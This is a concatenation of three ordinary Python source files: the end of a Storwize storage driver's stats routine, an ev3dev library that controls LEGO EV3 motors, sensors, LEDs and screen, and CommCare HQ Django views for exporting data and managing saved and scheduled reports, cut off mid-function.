LOG.error(_('Could not get pool data from the storage'))
exception_message = (_('_update_volume_stats: '
'Could not get storage pool data'))
raise exception.VolumeBackendAPIException(data=exception_message)
data['total_capacity_gb'] = (float(attributes['capacity']) /
units.GiB)
data['free_capacity_gb'] = (float(attributes['free_capacity']) /
units.GiB)
data['easytier_support'] = attributes['easy_tier'] in ['on', 'auto']
data['compression_support'] = self._state['compression_enabled']
data['location_info'] = ('StorwizeSVCDriver:%(sys_id)s:%(pool)s' %
{'sys_id': self._state['system_id'],
'pool': pool})
self._stats = data
|
|
import os
import glob
import warnings
import logging
import re
import atexit
logger = logging.getLogger(__name__)
@atexit.register
def cleanup():
for f in glob.glob('/sys/class/tacho-motor/motor*/command'):
with open(f, 'w') as f:
f.write('stop')
for f in glob.glob('/sys/class/leds/*/trigger'):
with open(f, 'w') as f:
f.write('none')
for f in glob.glob('/sys/class/leds/*/brightness'):
with open(f, 'w') as f:
f.write('0')
class NoSuchSensorError(Exception):
def __init__(self, port, name=None):
self.port = port
self.name = name
def __str__(self):
return "No such sensor port=%d name=%s" % (self.port, self.name)
class NoSuchMotorError(Exception):
def __init__(self, port, _type):
self.port = port
self._type = _type
def __str__(self):
return "No such motor port=%s type=%s" % (self.port, self._type)
class NoSuchLibraryError(Exception):
def __init__(self, lib=""):
self.lib = lib
def __str__(self):
return "No such library %s" % self.lib
class Ev3StringType(object):
@staticmethod
def post_read(value):
return value
@staticmethod
def pre_write(value):
return value
class Ev3IntType(object):
@staticmethod
def post_read(value):
return int(value)
@staticmethod
def pre_write(value):
return str(value)
class Ev3BoolType(object):
@staticmethod
def post_read(value):
return bool(value)
@staticmethod
def pre_write(value):
return '1' if value else '0'
class Ev3OnOffType(object):
@staticmethod
def post_read(value):
return True if value == 'on' else False
@staticmethod
def pre_write(value):
if (value == 'on' or value == 'off'):
return value
else:
return 'on' if bool(value) else 'off'
class create_ev3_property(object):
def __init__(self, **kwargs):
self.kwargs = kwargs
def __call__(self, cls):
for name, args in self.kwargs.items():
def ev3_property(name, read_only=False, write_only=False, flush_on_write=False, property_type=Ev3StringType):
def fget(self):
if not write_only:
return property_type.post_read(self.read_value(name))
else:
return None
def fset(self, value):
self.write_value(
name, property_type.pre_write(value), flush_on_write)
return property(fget, None if read_only else fset)
setattr(cls, name, ev3_property(name, **args))
return cls
def get_battery_percentage():
"""
Return an int() of the percentage of battery life remaining
"""
voltage_max = None
voltage_min = None
voltage_now = None
with open('/sys/devices/platform/legoev3-battery/power_supply/legoev3-battery/uevent', 'r') as fh:
for line in fh:
if not voltage_max:
re_voltage_max = re.search(
'POWER_SUPPLY_VOLTAGE_MAX_DESIGN=(\d+)', line)
if re_voltage_max:
voltage_max = int(re_voltage_max.group(1))
continue
if not voltage_min:
re_voltage_min = re.search(
'POWER_SUPPLY_VOLTAGE_MIN_DESIGN=(\d+)', line)
if re_voltage_min:
voltage_min = int(re_voltage_min.group(1))
continue
if not voltage_now:
re_voltage_now = re.search(
'POWER_SUPPLY_VOLTAGE_NOW=(\d+)', line)
if re_voltage_now:
voltage_now = int(re_voltage_now.group(1))
if re_voltage_max and re_voltage_min and re_voltage_now:
break
if voltage_max and voltage_min and voltage_now:
# This happens with the EV3 rechargeable battery if it is fully charge
if voltage_now >= voltage_max:
return 100
# Haven't seen this scenario but it can't hurt to check for it
elif voltage_now <= voltage_min:
return 0
# voltage_now is between the min and max
else:
voltage_max -= voltage_min
voltage_now -= voltage_min
return int(voltage_now / float(voltage_max) * 100)
else:
logger.error('voltage_max %s, voltage_min %s, voltage_now %s' %
(voltage_max, voltage_min, voltage_now))
return 0
class Ev3Dev(object):
def __init__(self):
self.sys_path = ""
def read_value(self, name):
attr_file = os.path.join(self.sys_path, name)
if os.path.isfile(attr_file):
with open(attr_file) as f:
value = f.read().strip()
return value
else:
return None
def write_value(self, name, value, flush = False):
attr_file = os.path.join(self.sys_path, name)
if os.path.isfile(attr_file):
with open(attr_file, 'w') as f:
f.write(str(value))
if flush:
f.flush()
else:
return
@create_ev3_property(
bin_data={'read_only': True},
bin_data_format={'read_only': True},
decimals={'read_only': True},
#mode={ 'read_only': False},
fw_version={'read_only': True},
modes={'read_only': True},
name={'read_only': True},
port_name={'read_only': True},
uevent={'read_only': True},
units={'read_only': True},
value0={'read_only': True, 'property_type': Ev3IntType},
value1={'read_only': True, 'property_type': Ev3IntType},
value2={'read_only': True, 'property_type': Ev3IntType},
value3={'read_only': True, 'property_type': Ev3IntType},
value4={'read_only': True, 'property_type': Ev3IntType},
value5={'read_only': True, 'property_type': Ev3IntType},
value6={'read_only': True, 'property_type': Ev3IntType},
value7={'read_only': True, 'property_type': Ev3IntType}
)
class LegoSensor(Ev3Dev):
def __init__(self, port=-1, name=None):
Ev3Dev.__init__(self)
sensor_existing = False
if (port > 0):
self.port = port
for p in glob.glob('/sys/class/lego-sensor/sensor*/uevent'):
with open(p) as f:
for value in f:
if (value.strip().lower() == ('LEGO_ADDRESS=in' + str(port)).lower()):
self.sys_path = os.path.dirname(p)
sensor_existing = True
break
if name != None and port == -1:
for p in glob.glob('/sys/class/lego-sensor/sensor*/uevent'):
with open(p) as f:
port_name = None
for value in f:
if (value.strip().lower().startswith('LEGO_ADDRESS=in'.lower())):
port_name = value.strip()[-1]
if sensor_existing:
break
if (value.strip().lower() == ('LEGO_DRIVER_NAME=' + name).lower()):
self.sys_path = os.path.dirname(p)
sensor_existing = True
if port_name is not None:
break
if sensor_existing:
self.port = int(port_name)
break
if (not sensor_existing):
raise NoSuchSensorError(port, name)
self._mode = self.read_value('mode')
@property
def mode(self):
return self._mode
@mode.setter
def mode(self, value):
if (self._mode != value):
self._mode = value
self.write_value('mode', value)
def mode_force_flush(self, value):
self._mode = value
self.write_value('mode', value)
class Enum(object):
def __init__(self, *args, **kwargs):
for arg in args:
kwargs[arg] = arg
self.enum_dict = kwargs
def __getattr__(self, name):
if (name in self.enum_dict.keys()):
return self.enum_dict[name]
else:
raise NameError("no such item %s" % name)
@create_ev3_property(
commands={'read_only': True},
command={'read_only': True, 'write_only': True},
count_per_rot={'read_only': True, 'property_type': Ev3IntType},
driver_name={'read_only': True},
duty_cycle={'read_only': True, 'property_type': Ev3IntType},
duty_cycle_sp={'read_only': False, 'property_type': Ev3IntType},
encoder_polarity={'read_only': False},
polarity_mode={'read_only': False},
port_name={'read_only': True},
position={'read_only': False, 'property_type': Ev3IntType},
position_sp={'read_only': False, 'property_type': Ev3IntType},
ramp_down_sp={'read_only': False, 'property_type': Ev3IntType},
ramp_up_sp={'read_only': False, 'property_type': Ev3IntType},
speed={'read_only': True, 'property_type': Ev3IntType},
speed_regulation={'read_only': False, 'property_type': Ev3OnOffType},
speed_sp={'read_only': False, 'property_type': Ev3IntType},
state={'read_only': True},
stop_command={'read_only': False},
stop_commands={'read_only': True},
time_sp={'read_only': False, 'property_type': Ev3IntType},
uevent={'read_only': True}
)
class Motor(Ev3Dev):
STOP_MODE = Enum(COAST='coast', BRAKE='brake', HOLD='hold')
POSITION_MODE = Enum(RELATIVE='relative', ABSOLUTE='absolute')
PORT = Enum('A', 'B', 'C', 'D')
def __init__(self, port='', _type=''):
Ev3Dev.__init__(self)
motor_existing = False
searchpath = '/sys/class/tacho-motor/motor*/'
if (port != ''):
self.port = port
for p in glob.glob(searchpath + 'uevent'):
with open(p) as f:
for value in f:
if (value.strip().lower() == ('LEGO_ADDRESS=out' + port).lower()):
self.sys_path = os.path.dirname(p)
motor_existing = True
break
if (_type != '' and port == ''):
for p in glob.glob(searchpath + 'uevent'):
with open(p) as f:
port_name = None
for value in f:
if (value.strip().lower().startswith('LEGO_ADDRESS=out'.lower())):
port_name = value.strip()[-1]
if motor_existing:
break
if (value.strip().lower() == ('LEGO_DRIVER_NAME=' + _type).lower()):
self.sys_path = os.path.dirname(p)
motor_existing = True
if port_name is not None:
break
if motor_existing:
self.port = port_name
break
if (not motor_existing):
raise NoSuchMotorError(port, _type)
def stop(self):
self.write_value('command', 'stop')
def start(self):
self.write_value('command', self.mode)
def reset(self):
self.write_value('command', 'reset')
# setup functions just set up all the values, run calls start (run=1)
# these are separated so that multiple motors can be started at the same time
def setup_forever(self, speed_sp, **kwargs):
self.mode = 'run-forever'
for k in kwargs:
v = kwargs[k]
if (v != None):
setattr(self, k, v)
speed_regulation = self.speed_regulation
if (speed_regulation):
self.speed_sp = int(speed_sp)
else:
self.duty_cycle_sp = int(speed_sp)
def run_forever(self, speed_sp, **kwargs):
self.setup_forever(speed_sp, **kwargs)
self.start()
def setup_direct(self, duty_cycle_sp, **kwargs):
self.mode = 'run-forever'
for k in kwargs:
v = kwargs[k]
if (v != None):
setattr(self, k, v)
self.duty_cycle_sp = int(duty_cycle_sp)
def run_direct(self, duty_cycle_sp, **kwargs):
self.setup_direct(duty_cycle_sp, **kwargs)
self.start()
def setup_time_limited(self, time_sp, speed_sp, **kwargs):
self.mode = 'run-timed'
for k in kwargs:
v = kwargs[k]
if (v != None):
setattr(self, k, v)
speed_regulation = self.speed_regulation
if (speed_regulation):
self.speed_sp = int(speed_sp)
else:
self.duty_cycle_sp = int(speed_sp)
self.time_sp = int(time_sp)
def run_time_limited(self, time_sp, speed_sp, **kwargs):
self.setup_time_limited(time_sp, speed_sp, **kwargs)
self.start()
def setup_position_limited(self, position_sp, speed_sp, absolute=True, **kwargs):
if absolute == True:
self.mode = 'run-to-abs-pos'
else:
self.mode = 'run-to-rel-pos'
kwargs['speed_regulation'] = True
for k in kwargs:
v = kwargs[k]
if (v != None):
setattr(self, k, v)
self.speed_sp = int(speed_sp)
self.position_sp = int(position_sp)
def run_position_limited(self, position_sp, speed_sp, **kwargs):
self.setup_position_limited(position_sp, speed_sp, **kwargs)
self.start()
def I2CSMBusProxy(cls):
try:
from smbus import SMBus
smbus_proxied_methods = [
m for m in dir(SMBus) if (m.startswith('read') or m.startswith('write'))]
for m in smbus_proxied_methods:
def create_proxied_smb_method(method):
def proxied_smb_method(self, *args, **kwargs):
return getattr(self.b, method)(self.addr, *args, **kwargs)
return proxied_smb_method
setattr(cls, m, create_proxied_smb_method(m))
return cls
except ImportError:
warnings.warn('python-smbus binding not found!')
return cls
@I2CSMBusProxy
class I2CS(object):
def __init__(self, port, addr):
self.port = port
self.i2c_port = port + 2
self.sys_path = '/dev/i2c-%s' % self.i2c_port
if (not os.path.exists(self.sys_path)):
raise NoSuchSensorError(port)
try:
from smbus import SMBus
self.b = SMBus(self.i2c_port)
self.addr = addr
except ImportError:
raise NoSuchLibraryError('smbus')
def read_byte_array(self, reg, _len):
return [self.read_byte_data(reg + r) for r in range(_len)]
def read_byte_array_as_string(self, reg, _len):
return ''.join(chr(r) for r in self.read_byte_array(reg, _len))
class create_i2c_property(object):
def __init__(self, **kwargs):
self.kwargs = kwargs
def __call__(self, cls):
for name, reg_address_and_read_only in self.kwargs.items():
def i2c_property(reg, read_only=True):
def fget(self):
return self.read_byte_data(reg)
def fset(self, value):
return self.write_byte_data(reg, value)
return property(fget, None if read_only else fset)
if (type(reg_address_and_read_only) == int):
prop = i2c_property(reg_address_and_read_only)
else:
prop = i2c_property(
reg_address_and_read_only[0], **reg_address_and_read_only[1])
setattr(cls, name, prop)
return cls
@create_ev3_property(
brightness={'read_only': False, 'property_type': Ev3IntType},
max_brightness={'read_only': True, 'property_type': Ev3IntType},
trigger={'read_only': False, 'flush_on_write': True},
delay_on={'read_only': False, 'property_type': Ev3IntType},
delay_off={'read_only': False, 'property_type': Ev3IntType}
)
class LEDLight(Ev3Dev):
def __init__(self, light_path):
super(Ev3Dev, self).__init__()
self.sys_path = '/sys/class/leds/' + light_path
class LEDSide (object):
def __init__(self, left_or_right):
self.green = LEDLight('ev3-%s1:green:ev3dev' % left_or_right)
self.red = LEDLight('ev3-%s0:red:ev3dev' % left_or_right)
self._color = (0, 0)
@property
def color(self):
"""LED color (RED, GREEN), where RED and GREEN are integers
between 0 and 255."""
return self._color
@color.setter
def color(self, value):
assert len(value) == 2
assert 0 <= value[0] <= self.red.max_brightness
assert 0 <= value[1] <= self.green.max_brightness
self._color = (
self.red.brightness, self.green.brightness) = tuple(value)
def blink(self, color=(0, 0), **kwargs):
if (color != (0, 0)):
self.color = color
for index, light in enumerate((self.red, self.green)):
if (not self._color[index]):
continue
light.trigger = 'timer'
for p, v in kwargs.items():
setattr(light, p, v)
def on(self):
self.green.trigger, self.red.trigger = 'none', 'none'
self.red.brightness, self.green.brightness = self._color
def off(self):
self.green.trigger, self.red.trigger = 'none', 'none'
self.red.brightness, self.green.brightness = 0, 0
class LED(object):
class COLOR:
NONE = (0, 0)
RED = (255, 0)
GREEN = (0, 255)
YELLOW = (25, 255)
ORANGE = (120, 255)
AMBER = (255, 255)
left = LEDSide('left')
right = LEDSide('right')
@create_ev3_property(
tone={'read_only': False},
mode={'read_only': True},
volume={'read_only': False, 'property_type': Ev3IntType}
)
class Tone(Ev3Dev):
def __init__(self):
super(Ev3Dev, self).__init__()
self.sys_path = '/sys/devices/platform/snd-legoev3'
def play(self, frequency, milliseconds=1000):
self.tone = '%d %d' % (frequency, milliseconds)
def stop(self):
self.tone = '0'
class Lcd(object):
def __init__(self):
try:
from PIL import Image, ImageDraw
SCREEN_WIDTH = 178
SCREEN_HEIGHT = 128
HW_MEM_WIDTH = int((SCREEN_WIDTH + 31) / 32) * 4
SCREEN_MEM_WIDTH = int((SCREEN_WIDTH + 7) / 8)
LCD_BUFFER_LENGTH = SCREEN_MEM_WIDTH * SCREEN_HEIGHT
LCD_HW_BUFFER_LENGTH = HW_MEM_WIDTH * SCREEN_HEIGHT
self._buffer = Image.new(
"1", (HW_MEM_WIDTH * 8, SCREEN_HEIGHT), "white")
self._draw = ImageDraw.Draw(self._buffer)
except ImportError:
raise NoSuchLibraryError('PIL')
def update(self):
f = os.open('/dev/fb0', os.O_RDWR)
os.write(f, self._buffer.tobytes("raw", "1;IR"))
os.close(f)
@property
def buffer(self):
return self._buffer
@property
def draw(self):
return self._draw
def reset(self):
self._draw.rectangle(
(0, 0) + self._buffer.size, outline='white', fill='white')
class attach_ev3_keys(object):
def __init__(self, **kwargs):
self.kwargs = kwargs
def __call__(self, cls):
key_const = {}
for key_name, key_code in self.kwargs.items():
def attach_key(key_name, key_code):
def fget(self):
buf = self.polling()
return self.test_bit(key_code, buf)
return property(fget)
setattr(cls, key_name, attach_key(key_name, key_code))
key_const[key_name.upper()] = key_code
setattr(cls, 'CODE', Enum(**key_const))
return cls
import array
import fcntl
@attach_ev3_keys(
up=103,
down=108,
left=105,
right=106,
enter=28,
backspace=14
)
class Key(object):
def __init__(self):
pass
def EVIOCGKEY(self, length):
return 2 << (14 + 8 + 8) | length << (8 + 8) | ord('E') << 8 | 0x18
def test_bit(self, bit, bytes):
# bit in bytes is 1 when released and 0 when pressed
return not bool(bytes[int(bit / 8)] & 1 << bit % 8)
def polling(self):
KEY_MAX = 0x2ff
BUF_LEN = int((KEY_MAX + 7) / 8)
buf = array.array('B', [0] * BUF_LEN)
with open('/dev/input/by-path/platform-gpio-keys.0-event', 'r') as fd:
ret = fcntl.ioctl(fd, self.EVIOCGKEY(len(buf)), buf)
if (ret < 0):
return None
else:
return buf
|
|
import os
import json
import tempfile
import re
from datetime import datetime, timedelta, date
from urllib2 import URLError
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.decorators import permission_required
from django.core.cache import cache
from django.core.servers.basehttp import FileWrapper
from django.core.urlresolvers import reverse
from django.http import (HttpResponseRedirect, HttpResponse,
HttpResponseBadRequest, Http404, HttpResponseForbidden)
from django.shortcuts import render
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from django.views.decorators.http import (require_http_methods,
require_POST, require_GET)
from casexml.apps.case.models import CommCareCase
from casexml.apps.case.templatetags.case_tags import case_inline_display
from couchdbkit.exceptions import ResourceNotFound
from casexml.apps.case.xml import V2
from corehq.apps.reports.exportfilters import default_form_filter
import couchexport
from couchexport import views as couchexport_views
from couchexport.export import SchemaMismatchException
from couchexport.export import UnsupportedExportFormat
from couchexport.models import Format, FakeSavedExportSchema, SavedBasicExport
from couchexport.shortcuts import (export_data_shared, export_raw_data,
export_response)
from couchexport.tasks import rebuild_schemas
from couchexport.util import SerializableFunction
import couchforms.views as couchforms_views
from couchforms.filters import instances
from couchforms.models import XFormInstance, doc_types
from couchforms.templatetags.xform_tags import render_form
from dimagi.utils.chunked import chunked
from dimagi.utils.couch.bulk import wrapped_docs
from dimagi.utils.couch.loosechange import parse_date
from dimagi.utils.decorators.datespan import datespan_in_request
from dimagi.utils.export import WorkBook
from dimagi.utils.parsing import json_format_datetime, string_to_boolean
from dimagi.utils.web import json_request, json_response
from fields import FilterUsersField
from soil import DownloadBase
from soil.tasks import prepare_download
from corehq.apps.domain.decorators import (login_and_domain_required,
login_or_digest)
from corehq.apps.export.custom_export_helpers import CustomExportHelper
from corehq.apps.groups.models import Group
from corehq.apps.hqcase.export import export_cases_and_referrals
from corehq.apps.reports.dispatcher import ProjectReportDispatcher
from corehq.apps.reports.models import ReportConfig, ReportNotification
from corehq.apps.reports.standard.cases.basic import CaseListReport
from corehq.apps.reports.tasks import create_metadata_export
from corehq.apps.reports import util
from corehq.apps.reports.util import get_all_users_by_domain
from corehq.apps.reports.standard import inspect, export, ProjectReport
from corehq.apps.reports.export import (ApplicationBulkExportHelper,
CustomBulkExportHelper, save_metadata_export_to_tempfile)
from corehq.apps.users.decorators import require_permission
from corehq.apps.users.export import export_users
from corehq.apps.users.models import CommCareUser
from corehq.apps.users.models import Permissions
DATE_FORMAT = "%Y-%m-%d"
datespan_default = datespan_in_request(
from_param="startdate",
to_param="enddate",
default_days=7,
)
require_form_export_permission = require_permission(Permissions.view_report, 'corehq.apps.reports.standard.export.ExcelExportReport', login_decorator=None)
require_case_export_permission = require_permission(Permissions.view_report, 'corehq.apps.reports.standard.export.CaseExportReport', login_decorator=None)
require_form_view_permission = require_permission(Permissions.view_report, 'corehq.apps.reports.standard.inspect.SubmitHistory', login_decorator=None)
require_case_view_permission = require_permission(Permissions.view_report, 'corehq.apps.reports.standard.cases.basic.CaseListReport', login_decorator=None)
require_can_view_all_reports = require_permission(Permissions.view_reports)
@login_and_domain_required
def default(request, domain):
return HttpResponseRedirect(reverse(saved_reports, args=[domain]))
@login_and_domain_required
def old_saved_reports(request, domain):
return default(request, domain)
@login_and_domain_required
def saved_reports(request, domain, template="reports/reports_home.html"):
user = request.couch_user
if not (request.couch_user.can_view_reports() or request.couch_user.get_viewable_reports()):
raise Http404
configs = ReportConfig.by_domain_and_owner(domain, user._id)
def _is_valid(rn):
# the _id check is for weird bugs we've seen in the wild that look like
# oddities in couch.
return hasattr(rn, "_id") and rn._id and (not hasattr(rn, 'report_slug') or rn.report_slug != 'admin_domains')
scheduled_reports = [rn for rn in ReportNotification.by_domain_and_owner(domain, user._id) if _is_valid(rn)]
scheduled_reports = sorted(scheduled_reports, key=lambda rn: rn.configs[0].name)
context = dict(
couch_user=request.couch_user,
domain=domain,
configs=configs,
scheduled_reports=scheduled_reports,
report=dict(
title=_("My Saved Reports"),
show=user.can_view_reports() or user.get_viewable_reports(),
slug=None,
is_async=True,
section_name=ProjectReport.section_name,
),
)
if request.couch_user:
util.set_report_announcements_for_user(request, user)
return render(request, template, context)
@login_or_digest
@require_form_export_permission
@datespan_default
@require_GET
def export_data(req, domain):
"""
Download all data for a couchdbkit model
"""
try:
export_tag = json.loads(req.GET.get("export_tag", "null") or "null")
except ValueError:
return HttpResponseBadRequest()
group, users = util.get_group_params(domain, **json_request(req.GET))
include_errors = string_to_boolean(req.GET.get("include_errors", False))
kwargs = {"format": req.GET.get("format", Format.XLS_2007),
"previous_export_id": req.GET.get("previous_export", None),
"filename": export_tag,
"use_cache": string_to_boolean(req.GET.get("use_cache", "True")),
"max_column_size": int(req.GET.get("max_column_size", 2000)),
"separator": req.GET.get("separator", "|")}
user_filter, _ = FilterUsersField.get_user_filter(req)
if user_filter:
users_matching_filter = map(lambda x: x.get('user_id'),
get_all_users_by_domain(domain, user_filter=user_filter, simplified=True))
def _ufilter(user):
try:
return user['form']['meta']['userID'] in users_matching_filter
except KeyError:
return False
filter = _ufilter
else:
filter = SerializableFunction(util.group_filter, group=group)
errors_filter = instances if not include_errors else None
kwargs['filter'] = couchexport.util.intersect_functions(filter, errors_filter)
if kwargs['format'] == 'raw':
resp = export_raw_data([domain, export_tag], filename=export_tag)
else:
try:
resp = export_data_shared([domain,export_tag], **kwargs)
except UnsupportedExportFormat as e:
return HttpResponseBadRequest(e)
if resp:
return resp
else:
messages.error(req, "Sorry, there was no data found for the tag '%s'." % export_tag)
next = req.GET.get("next", "")
if not next:
next = export.ExcelExportReport.get_url(domain=domain)
return HttpResponseRedirect(next)
@require_form_export_permission
@login_and_domain_required
@datespan_default
@require_GET
def export_data_async(request, domain):
"""
Download all data for a couchdbkit model
"""
try:
export_tag = json.loads(request.GET.get("export_tag", "null") or "null")
export_type = request.GET.get("type", "form")
except ValueError:
return HttpResponseBadRequest()
assert(export_tag[0] == domain)
filter = util.create_export_filter(request, domain, export_type=export_type)
return couchexport_views.export_data_async(request, filter=filter, type=export_type)
@login_or_digest
@datespan_default
@require_GET
def export_default_or_custom_data(request, domain, export_id=None, bulk_export=False):
"""
Export data from a saved export schema
"""
deid = request.GET.get('deid') == 'true'
if deid:
return _export_deid(request, domain, export_id, bulk_export=bulk_export)
else:
return _export_no_deid(request, domain, export_id, bulk_export=bulk_export)
@require_permission('view_report', 'corehq.apps.reports.standard.export.DeidExportReport', login_decorator=None)
def _export_deid(request, domain, export_id=None, bulk_export=False):
return _export_default_or_custom_data(request, domain, export_id, bulk_export=bulk_export, safe_only=True)
@require_form_export_permission
def _export_no_deid(request, domain, export_id=None, bulk_export=False):
return _export_default_or_custom_data(request, domain, export_id, bulk_export=bulk_export)
def _export_default_or_custom_data(request, domain, export_id=None, bulk_export=False, safe_only=False):
async = request.GET.get('async') == 'true'
next = request.GET.get("next", "")
format = request.GET.get("format", "")
export_type = request.GET.get("type", "form")
previous_export_id = request.GET.get("previous_export", None)
filename = request.GET.get("filename", None)
max_column_size = int(request.GET.get("max_column_size", 2000))
filter = util.create_export_filter(request, domain, export_type=export_type)
if bulk_export:
try:
is_custom = json.loads(request.GET.get("is_custom", "false"))
export_tags = json.loads(request.GET.get("export_tags", "null") or "null")
except ValueError:
return HttpResponseBadRequest()
export_helper = (CustomBulkExportHelper if is_custom else ApplicationBulkExportHelper)(
domain=domain,
safe_only=safe_only
)
return export_helper.prepare_export(export_tags, filter)
elif export_id:
# this is a custom export
try:
export_object = CustomExportHelper.make(request, export_type, domain, export_id).custom_export
if safe_only and not export_object.is_safe:
return HttpResponseForbidden()
except ResourceNotFound:
raise Http404()
elif safe_only:
return HttpResponseForbidden()
else:
if not async:
# this function doesn't support synchronous export without a custom export object
# if we ever want that (i.e. for HTML Preview) then we just need to give
# FakeSavedExportSchema a download_data function (called below)
return HttpResponseBadRequest()
try:
export_tag = json.loads(request.GET.get("export_tag", "null") or "null")
except ValueError:
return HttpResponseBadRequest()
assert(export_tag[0] == domain)
# hack - also filter instances here rather than mess too much with trying to make this
# look more like a FormExportSchema
if export_type == 'form':
filter &= SerializableFunction(instances)
export_object = FakeSavedExportSchema(index=export_tag)
if export_type == 'form':
_filter = filter
filter = SerializableFunction(default_form_filter, filter=_filter)
if not filename:
filename = export_object.name
filename += ' ' + date.today().isoformat()
if async:
return export_object.export_data_async(
filter=filter,
filename=filename,
previous_export_id=previous_export_id,
format=format,
max_column_size=max_column_size,
)
else:
if not next:
next = export.ExcelExportReport.get_url(domain=domain)
try:
resp = export_object.download_data(format, filter=filter)
except SchemaMismatchException, e:
rebuild_schemas.delay(export_object.index)
messages.error(
request,
"Sorry, the export failed for %s, please try again later" \
% export_object.name
)
return HttpResponseRedirect(next)
if resp:
return resp
else:
messages.error(request, "Sorry, there was no data found for the tag '%s'." % export_object.name)
return HttpResponseRedirect(next)
@login_or_digest
@require_form_export_permission
@require_GET
def hq_download_saved_export(req, domain, export_id):
export = SavedBasicExport.get(export_id)
# quasi-security hack: the first key of the index is always assumed
# to be the domain
assert domain == export.configuration.index[0]
return couchexport_views.download_saved_export(req, export_id)
@login_or_digest
@require_form_export_permission
@require_GET
def export_all_form_metadata(req, domain):
"""
Export metadata for _all_ forms in a domain.
"""
format = req.GET.get("format", Format.XLS_2007)
tmp_path = save_metadata_export_to_tempfile(domain)
return export_response(open(tmp_path), format, "%s_forms" % domain)
@login_or_digest
@require_form_export_permission
@require_GET
@datespan_in_request(from_param="startdate", to_param="enddate")
def export_all_form_metadata_async(req, domain):
datespan = req.datespan if req.GET.get("startdate") and req.GET.get("enddate") else None
group_id = req.GET.get("group")
ufilter = FilterUsersField.get_user_filter(req)[0]
users = list(util.get_all_users_by_domain(domain=domain, group=group_id, user_filter=ufilter, simplified=True))
user_ids = filter(None, [u["user_id"] for u in users])
format = req.GET.get("format", Format.XLS_2007)
filename = "%s_forms" % domain
download = DownloadBase()
download.set_task(create_metadata_export.delay(
download.download_id,
domain,
format=format,
filename=filename,
datespan=datespan,
user_ids=user_ids,
))
return download.get_start_response()
def touch_saved_reports_views(user, domain):
"""
Hit the saved reports views so stale=update_after doesn't cause the user to
see old or deleted data after a change when they next load the reports
homepage.
"""
ReportConfig.by_domain_and_owner(domain, user._id, limit=1, stale=False)
ReportNotification.by_domain_and_owner(domain, user._id, limit=1, stale=False)
@login_and_domain_required
@require_POST
def add_config(request, domain=None):
# todo: refactor this into a django form
from datetime import datetime
user_id = request.couch_user._id
POST = json.loads(request.raw_post_data)
if 'name' not in POST or not POST['name']:
return HttpResponseBadRequest()
user_configs = ReportConfig.by_domain_and_owner(domain, user_id)
if not POST.get('_id') and POST['name'] in [c.name for c in user_configs]:
return HttpResponseBadRequest()
to_date = lambda s: datetime.strptime(s, '%Y-%m-%d').date() if s else s
try:
POST['start_date'] = to_date(POST['start_date'])
POST['end_date'] = to_date(POST['end_date'])
except ValueError:
# invalidly formatted date input
return HttpResponseBadRequest()
date_range = POST.get('date_range')
if date_range == 'last7':
POST['days'] = 7
elif date_range == 'last30':
POST['days'] = 30
elif POST.get('days'):
POST['days'] = int(POST['days'])
exclude_filters = ['startdate', 'enddate']
for field in exclude_filters:
POST['filters'].pop(field, None)
config = ReportConfig.get_or_create(POST.get('_id', None))
if config.owner_id:
# in case a user maliciously tries to edit another user's config
assert config.owner_id == user_id
else:
config.domain = domain
config.owner_id = user_id
for field in config.properties().keys():
if field in POST:
setattr(config, field, POST[field])
if POST.get('days') or date_range == 'lastmonth': # remove start and end date if the date range is "last xx days"
if "start_date" in config:
delattr(config, "start_date")
if "end_date" in config:
delattr(config, "end_date")
config.save()
touch_saved_reports_views(request.couch_user, domain)
return json_response(config)
@login_and_domain_required
@datespan_default
def email_report(request, domain, report_slug, report_type=ProjectReportDispatcher.prefix):
from dimagi.utils.django.email import send_HTML_email
from forms import EmailReportForm
user_id = request.couch_user._id
form = EmailReportForm(request.GET)
if not form.is_valid():
return HttpResponseBadRequest()
config = ReportConfig()
# see ReportConfig.query_string()
object.__setattr__(config, '_id', 'dummy')
config.name = _("Emailed report")
config.report_type = report_type
config.report_slug = report_slug
config.owner_id = user_id
config.domain = domain
config.date_range = 'range'
config.start_date = request.datespan.computed_startdate.date()
config.end_date = request.datespan.computed_enddate.date()
GET = dict(request.GET.iterlists())
exclude = ['startdate', 'enddate', 'subject', 'send_to_owner', 'notes', 'recipient_emails']
filters = {}
for field in GET:
if not field in exclude:
filters[field] = GET.get(field)
config.filters = filters
body = _render_report_configs(request, [config],
domain,
user_id, request.couch_user,
True,
notes=form.cleaned_data['notes'])[0].content
subject = form.cleaned_data['subject'] or _("Email report from CommCare HQ")
if form.cleaned_data['send_to_owner']:
send_HTML_email(subject, request.couch_user.get_email(), body,
email_from=settings.DEFAULT_FROM_EMAIL)
if form.cleaned_data['recipient_emails']:
for recipient in form.cleaned_data['recipient_emails']:
send_HTML_email(subject, recipient, body, email_from=settings.DEFAULT_FROM_EMAIL)
return HttpResponse()
@login_and_domain_required
@require_http_methods(['DELETE'])
def delete_config(request, domain, config_id):
try:
config = ReportConfig.get(config_id)
except ResourceNotFound:
raise Http404()
config.delete()
touch_saved_reports_views(request.couch_user, domain)
return HttpResponse()
@login_and_domain_required
def edit_scheduled_report(request, domain, scheduled_report_id=None,
template="reports/edit_scheduled_report.html"):
from corehq.apps.users.models import WebUser
from corehq.apps.reports.forms import ScheduledReportForm
context = {
'form': None,
'domain': domain,
'report': {
'show': request.couch_user.can_view_reports() or request.couch_user.get_viewable_reports(),
'slug': None,
'default_url': reverse('reports_home', args=(domain,)),
'is_async': False,
'section_name': ProjectReport.section_name,
}
}
user_id = request.couch_user._id
configs = ReportConfig.by_domain_and_owner(domain, user_id)
config_choices = [(c._id, c.full_name) for c in configs if c.report and c.report.emailable]
if not config_choices:
return render(request, template, context)
web_users = WebUser.view('users/web_users_by_domain', reduce=False,
key=domain, include_docs=True).all()
web_user_emails = [u.get_email() for u in web_users]
if scheduled_report_id:
instance = ReportNotification.get(scheduled_report_id)
if instance.owner_id != user_id or instance.domain != domain:
raise HttpResponseBadRequest()
else:
instance = ReportNotification(owner_id=user_id, domain=domain,
config_ids=[], hour=8,
send_to_owner=True, recipient_emails=[])
is_new = instance.new_document
initial = instance.to_json()
initial['recipient_emails'] = ', '.join(initial['recipient_emails'])
kwargs = {'initial': initial}
args = (request.POST,) if request.method == "POST" else ()
form = ScheduledReportForm(*args, **kwargs)
form.fields['config_ids'].choices = config_choices
form.fields['recipient_emails'].choices = web_user_emails
if request.method == "POST" and form.is_valid():
for k, v in form.cleaned_data.items():
setattr(instance, k, v)
instance.save()
if is_new:
messages.success(request, "Scheduled report added!")
else:
